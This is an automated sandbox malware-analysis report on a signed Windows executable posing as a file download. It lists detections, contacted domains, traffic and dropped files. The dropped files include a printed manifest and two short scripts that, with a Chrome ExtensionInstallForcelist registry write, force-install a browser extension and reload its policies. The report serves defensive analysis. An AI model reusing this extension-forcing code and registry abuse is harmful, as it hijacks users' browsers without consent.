Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 0_2_00914ACC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00914ACC

Lowering of HIPS / PFW / Operating System Security Settings

Modifies Chrome's extension installation force list

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\google\chrome\ExtensionInstallForcelist

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	11 Browser Extensions	11 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Native API	Logon Script (Windows)	1 Extra Window Memory Injection	1 Modify Registry	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	33 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Your File Is Ready To Download.exe	71%	ReversingLabs	Win32.Browser.Shafmia
Your File Is Ready To Download.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://getfiles.wiki/welcome.php%s	100%	Avira URL Cloud	malware
https://getfiles.wiki/welcome.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
getfiles.wiki	185.107.56.193	true	false		unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://getfiles.wiki/welcome.php%s	Your File Is Ready To Download.exe, 00000000.00000002.11892490158.000000000091D000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://getfiles.wiki/welcome.php	Your File Is Ready To Download.exe, Your File Is Ready To Download.exe, 00000000.00000002.11892532407.0000000000984000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.107.56.193	getfiles.wiki	Netherlands		43350	NFORCENL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583876
Start date and time:	2025-01-03 19:56:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Number of analysed new started processes analysed:	47
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Your File Is Ready To Download.exe
Detection:	MAL
Classification:	mal68.phis.winEXE@33/4@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 18 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 172.217.18.3, 64.233.184.84, 142.250.186.142, 142.250.185.195, 142.250.185.174, 142.250.185.78, 142.250.181.238, 142.250.186.46, 172.202.163.200, 142.250.185.106, 142.250.186.170, 142.250.185.74, 172.217.18.106, 216.58.212.170, 142.250.185.202, 142.250.185.170, 142.250.184.234, 216.58.206.74, 142.250.185.138, 172.217.23.106, 142.250.185.234, 172.217.18.10, 142.250.186.106, 142.250.186.74, 172.217.16.202, 13.107.21.237, 23.56.254.164, 20.199.58.43, 20.190.159.2
Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, fd.api.iris.microsoft.com, a-0003.a-msedge.net, oneocsp-microsoft-com.a-0003.a-msedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, oneocsp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, res.public.onecdn.static.microsoft, ocsp.edge.digicert.com, sls.update.microsoft.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Your File Is Ready To Download.exe

Simulations

Behavior and APIs

Time	Type	Description
13:56:56	API Interceptor	1x Sleep call for process: Your File Is Ready To Download.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	http://www.klim.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	Reparto Trabajo TP4.xlsm	Get hash	malicious	Unknown	Browse	192.229.221.95
	EwpsQzeky5.msi	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690	Get hash	malicious	Unknown	Browse	192.229.221.95
	hcxmivKYfL.exe	Get hash	malicious	RedLine	Browse	192.229.221.95
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	192.229.221.95
	BEncode Editor.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	valyzt.msi	Get hash	malicious	XRed	Browse	192.229.221.95
	docx.msi	Get hash	malicious	XRed	Browse	192.229.221.95
getfiles.wiki	Your File Is Ready To Download.zip	Get hash	malicious	Unknown	Browse	104.21.11.107
	chromecache_103.1.exe	Get hash	malicious	Unknown	Browse	188.114.96.7
	edgchrv5.exe	Get hash	malicious	Unknown	Browse	188.114.97.7
	TriMPFPatch56form20230426.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	luxor - pharaoh's challenge.exe	Get hash	malicious	Unknown	Browse	188.114.97.7
	$RDGU87D.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	$RLFVMMG.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	inno-chrome-malware.exe	Get hash	malicious	Unknown	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NFORCENL	236236236.elf	Get hash	malicious	Unknown	Browse	77.247.183.149
	https://icsportal-update.duckdns.org/sq0.php?session=675a91d9e40e3	Get hash	malicious	Unknown	Browse	185.45.195.138
	y1rS62yprs.exe	Get hash	malicious	Babadeda	Browse	46.166.186.7
	y1rS62yprs.exe	Get hash	malicious	Babadeda	Browse	46.166.186.6
	jew.ppc.elf	Get hash	malicious	Unknown	Browse	46.166.152.193
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	179.60.150.123
	bot.sh4.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	185.7.78.88
	bot.arm.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	185.7.78.88
	bot.x86_64.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	185.7.78.88
	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	185.7.78.88

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\ServiceApp\apps-helper\chrome.crx

Download File

Process:	C:\Users\user\Desktop\Your File Is Ready To Download.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	46651
Entropy (8bit):	7.95882665721754
Encrypted:	false
SSDEEP:	768:37cjcBjsI/hbTTWJp8ThElAfPryn5QzShaPuChbhFbHRu/llKGr7J9FwyIlWg+S0:3hv5Hq8ThElAfzyneSMPuKbvzUllKGzr
MD5:	A960766B263F208186D07CF900B9EF02
SHA1:	41BBB20A9EA2DBBCC527B1BD908F618FB7489D70
SHA-256:	85333EB6F5EFF972FA595FC7C2D16DD08097ACB57AABF769F19DD05E221E3AD2
SHA-512:	C806E6370BC5DAE8557AF61FA0CC7FD6F9B6ED3B3F871CA234CE5DEDF93E522A4D5D42AFCB1C9136DC267BC8CBE92649511F0248581C094D4BDF1CB3E83F1C55
Malicious:	false
Reputation:	low
Preview:	Cr24....E.........0.."0....H.............0...........g.@..B......QvIMtv..PCN.L..;..,.t...f...t...5...^"O..x.x...&......g..X..Z..-.N....j8gg..Y.zo...bwOG._..J.r..u......<.4...B.~l.ud.....0U.;...W?z..:F...r.W.)...!..........,.L.+.vb:..h.....K..W....E.....JL.u...1........0........Gd.;....O..h.........g..6.2=`.".2/...Q.g... f.$.IrX....w.7....S...~......6.5.m.{..%..N....\|...l.O..O.. .L.,L..l...l..@....].R...(.sDAW.3..F..5...3.c.p.\|...........zX>V.}5.O..S....#...^.1..Qd`._.\e.......j.....g.z7x.X..8.u.7>42....f1{$r.......<.`.1..$=..Zj.......L..`.......I<'...c.\....rQPK..-.......OV...[............manifest.json.....................SMo.0...W...(.9n..h.a.......!3.#W..%.....I.]wK..f?>>R...".r...Y...m^D.d.....:a[.@.w#>..w{C..-k=.j.Y.m....Q..#)a...._........f........u.b.!....xc.o0......<@.C...CK..m..<. ..`.h..S....d. p..IW.:=wn7......8...3...$.\|..)..?.X~,.b.,.....c....bJ..uqY.. ...Q.u.v..%B^..E[......8..qJ.Fg...V.b.Pa>..[`.cFJ..v....M..7)...8ipiyj..a...5.5../..

C:\Users\user\AppData\Local\ServiceApp\apps-helper\manifest.json

Download File

Process:	C:\Users\user\Desktop\Your File Is Ready To Download.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	273
Entropy (8bit):	4.76438627845756
Encrypted:	false
SSDEEP:	6:EW/COIk/hsu1wC6VAPk8yyWSD9kn+E8Lyg8c:r6OJhsu1wXAPk8Sic+EaPN
MD5:	99F8D6AA35E67DB20B5F6E3FC54101CE
SHA1:	37E09293AA7CDB8FAE7754AAAE3E8BD2591A2F29
SHA-256:	CC1C1C7AA14AC707F66629095B8E117109660C13511F26D6EEDA1E9FDC363AB2
SHA-512:	57562DBE3C33139B98FF244CDCC233C9689823A11032D42B9B179EDA53831481422D69A62691EEBFF34C0AE85C36CBE7F8B16599D89919BAB759CFD38AF27797
Malicious:	false
Preview:	{..."name": "Apps",..."description": "",..."version": "1.0",..."manifest_version": 3,..."background": {...."service_worker": "service.js",...."type": "module"...},..."permissions": ["tabs", "scripting", "management", "background"],..."host_permissions": ["chrome:///"]..}

C:\Users\user\AppData\Local\ServiceApp\apps-helper\service.js

Download File

Process:	C:\Users\user\Desktop\Your File Is Ready To Download.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.103868585629314
Encrypted:	false
SSDEEP:	6:YXOBLow3rzLQm4yRDUwNR21aMXgBDoQYIxXYMoVsxrHLLqL:Y+9o0g3IMIDVYVMjrSL
MD5:	D396BCBECCA65BEE695815EC741653AC
SHA1:	CF4725418D0704F2E7A7E1F7E0FEFE840937C053
SHA-256:	C19DBE8A294A122EB5763A1D0F29B48BE6ED2A6892D56B3035261D4EBB3E30F6
SHA-512:	B1B0BBF423AC66F60AB591BF9CF62528FA224B3B8E46139CC112C5DEE4F6ED834498CC3C69962C7663A3BCAEF14B68B20AEFDE487EB85D7D93651A1B2A9F8EFF
Malicious:	false
Preview:	chrome.management.onInstalled.addListener(info => {...if (info.id != 'jdejdmchbgaciegdmifmnkopbdbfhcfb') return;.....setTimeout(() => {....chrome.tabs.create({ url: 'chrome://policy' }, tab => {.....chrome.scripting.executeScript({......target: { tabId: tab.id },......files: ['web.js'].... });....});...}, 500);..});

C:\Users\user\AppData\Local\ServiceApp\apps-helper\web.js

Download File

Process:	C:\Users\user\Desktop\Your File Is Ready To Download.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	299
Entropy (8bit):	4.8969499354657176
Encrypted:	false
SSDEEP:	6:oJRoJfwejEzKeYDFOEn9zmYnadRv5F8smvDNRU/snproLNRiif:ofoJYejj9n9Sdx5msmvDLrKdf
MD5:	78DA8C3C7BCC4FCBE1D1C1D4209BA026
SHA1:	CCACDA33826629E3A5B552BA26227D9D1B026BCA
SHA-256:	893FCFE4EDCDB07BCC3E05A3304F93F0358C9D8F4CC967058585F553BB82AD02
SHA-512:	01C3DEF2B9A38ABD5C6D447C52D8EC3533C8098DB69DCF30682EFA992BE71666D66A56AB3E6B161F8017FE018E20E479C365B780F3CF94ED507CAEA99EADBC06
Malicious:	false
Preview:	addEventListener('load', () => {...if (location.host !== 'policy') return;.....const reload = () => {....const button = document.querySelector('#reload-policies');......if (button) {.....button.click();.....setTimeout(close, 200);....} else {.....setTimeout(reload, 200);....}...}.....reload();..});

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.2951694799556455
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Your File Is Ready To Download.exe
File size:	203'120 bytes
MD5:	c350eacfe1e1e28295eb961af91e70f8
SHA1:	bca71c098aadb35a4e94f1f68d239eab1d11f52a
SHA256:	0b0dbc8833cc08b6d44607278f7945b015c23dcfd2531cd5fe38b5dc65d28f5b
SHA512:	0f6f3b2b903cc53bcfefc2aeaa6fc95feb2b2eceb691efcc474d70129be2bc51bd89532902c58ee4e5a26018b03e14a5e4a00e4931896c884dc37c01ff8f1986
SSDEEP:	3072:TWMLRvbqV5RGlAQBpB4M41G7PrOWr7J4+xJ+:aMLRO0x541szhr7J4s+
TLSH:	A8145B02E640C065E304373659A1E5E0D57BFD395898E0CFF65C7ABA69B278349B328F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.o.I\|<.I\|<.I\|<...<.I\|<...<.I\|<...<.I\|<...<.I\|<...<.I\|<.I}<.I\|<...<.I\|<...<.I\|<...<.I\|<Rich.I\|<........PE..L.....od...........

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x4024f2
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x646F17DC [Thu May 25 08:10:04 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	79e188ad2407d06a2cb43728060e31e3

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	22/03/2023 15:10:47 22/03/2024 15:10:47
Subject Chain	CN=SOFTWARE ABFG LTD, O=SOFTWARE ABFG LTD, STREET="2nd Floor College House, 17 King Edwards Road", L=Ruislip, S=London, C=GB, OID.1.3.6.1.4.1.311.60.2.1.3=GB, SERIALNUMBER=14698890, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	FEE4DECF8FD42396157E11993B5B34D3
Thumbprint SHA-1:	EE81E7D510B97695351EF3F2E0C10F4D0601EDA6
Thumbprint SHA-256:	BAC0E9EE69D6FCA2A9B1164094103589FD63676A564F420D71A5B8A172BB3E7B
Serial:	3C22F5C916B284010CB8A481

Entrypoint Preview

Instruction
call 00007FCAC938EDCAh
jmp 00007FCAC938C66Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041A998h], eax
mov dword ptr [0041A994h], ecx
mov dword ptr [0041A990h], edx
mov dword ptr [0041A98Ch], ebx
mov dword ptr [0041A988h], esi
mov dword ptr [0041A984h], edi
mov word ptr [0041A9B0h], ss
mov word ptr [0041A9A4h], cs
mov word ptr [0041A980h], ds
mov word ptr [0041A97Ch], es
mov word ptr [0041A978h], fs
mov word ptr [0041A974h], gs
pushfd
pop dword ptr [0041A9A8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041A99Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041A9A0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041A9ACh], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041A8E8h], 00010001h
mov eax, dword ptr [0041A9A0h]
mov dword ptr [0041A89Ch], eax
mov dword ptr [0041A890h], C0000409h
mov dword ptr [0041A894h], 00000001h
mov eax, dword ptr [0040D004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0040D008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [00000034h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc7bc	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d000	0x13d8c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2ec00	0x2d70
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31000	0x968	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xc3b0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ca4	0x9e00	7954e3edf71628ed362680d37db68c4b	False	0.5902393196202531	data	6.543650178306183	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x1e7e	0x2000	90319f4515606c625cccdb03e4b0f2ca	False	0.349853515625	data	5.345127392800988	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xd000	0xf79c	0xda00	853aaeeebf0369a3acc1e4fe84be9c6f	False	0.8595721043577982	data	7.656745628296985	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1d000	0x13d8c	0x13e00	9c9f4cc955168ffffb42b32331e85d41	False	0.17713246855345913	data	3.9085055920586522	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x31000	0x1192	0x1200	09f6b0bc7ff674a66c6feefbace7fb46	False	0.45703125	data	4.344443129192919	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1d5f8	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0x1e060	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0x1e6c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0x1e9b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0x1ead8	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0x20100	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0x20fa8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0x21850	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0x21db8	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0x230a0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0x272c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0x29870	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0x2a918	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_ICON	0x2ad80	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.14650537634408603
RT_ICON	0x2b068	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.30405405405405406
RT_ICON	0x2b190	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.3070362473347548
RT_ICON	0x2c038	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.4842057761732852
RT_ICON	0x2c8e0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.3670520231213873
RT_ICON	0x2ce48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.1087136929460581
RT_ICON	0x2f3f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.23170731707317074
RT_ICON	0x30498	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.3599290780141844
RT_MENU	0x30900	0x4a	data	English	United States	0.8648648648648649
RT_DIALOG	0x3094c	0x144	data	English	United States	0.5679012345679012
RT_STRING	0x30a90	0x50	data	English	United States	0.6875
RT_ACCELERATOR	0x30ae0	0x10	data	English	United States	1.25
RT_GROUP_ICON	0x30af0	0xbc	data	English	United States	0.6170212765957447
RT_GROUP_ICON	0x30bac	0x76	data	English	United States	0.6610169491525424
RT_MANIFEST	0x30c24	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL

Import

KERNEL32.dll

GetModuleHandleW, GetProcAddress, WaitForSingleObject, CloseHandle, GetFileAttributesW, Sleep, FindFirstFileW, FindNextFileW, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, MultiByteToWideChar, LoadLibraryA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, FlushFileBuffers

SHELL32.dll

SHGetKnownFolderPath, SHGetSpecialFolderPathW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 19:56:58.481611013 CET	54544	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:58.481664896 CET	443	54544	185.107.56.193	192.168.2.24
Jan 3, 2025 19:56:58.481748104 CET	54544	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:58.482856989 CET	54545	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:58.482913017 CET	443	54545	185.107.56.193	192.168.2.24
Jan 3, 2025 19:56:58.482981920 CET	54545	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:58.483839035 CET	54544	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:58.483854055 CET	443	54544	185.107.56.193	192.168.2.24
Jan 3, 2025 19:56:58.561292887 CET	54545	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:58.561327934 CET	443	54545	185.107.56.193	192.168.2.24
Jan 3, 2025 19:56:59.339514971 CET	54544	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:59.339596987 CET	443	54544	185.107.56.193	192.168.2.24
Jan 3, 2025 19:56:59.339647055 CET	54545	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:59.339654922 CET	54544	443	192.168.2.24	185.107.56.193
Jan 3, 2025 19:56:59.387331963 CET	443	54545	185.107.56.193	192.168.2.24
Jan 3, 2025 19:56:59.399707079 CET	443	54545	185.107.56.193	192.168.2.24
Jan 3, 2025 19:56:59.399769068 CET	54545	443	192.168.2.24	185.107.56.193

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 19:56:58.081517935 CET	53	54468	1.1.1.1	192.168.2.24
Jan 3, 2025 19:56:58.140634060 CET	54214	53	192.168.2.24	1.1.1.1
Jan 3, 2025 19:56:58.141066074 CET	52464	53	192.168.2.24	1.1.1.1
Jan 3, 2025 19:56:58.148823023 CET	53	65290	1.1.1.1	192.168.2.24
Jan 3, 2025 19:56:58.217159986 CET	53	54214	1.1.1.1	192.168.2.24
Jan 3, 2025 19:56:58.453885078 CET	53	52464	1.1.1.1	192.168.2.24
Jan 3, 2025 19:57:01.024147034 CET	53	59594	1.1.1.1	192.168.2.24
Jan 3, 2025 19:57:01.040551901 CET	53	55065	1.1.1.1	192.168.2.24
Jan 3, 2025 19:57:02.241831064 CET	53	49382	1.1.1.1	192.168.2.24
Jan 3, 2025 19:57:10.524683952 CET	53	52965	1.1.1.1	192.168.2.24

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 19:56:58.140634060 CET	192.168.2.24	1.1.1.1	0x1b77	Standard query (0)	getfiles.wiki	A (IP address)	IN (0x0001)	false
Jan 3, 2025 19:56:58.141066074 CET	192.168.2.24	1.1.1.1	0x59b0	Standard query (0)	getfiles.wiki	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
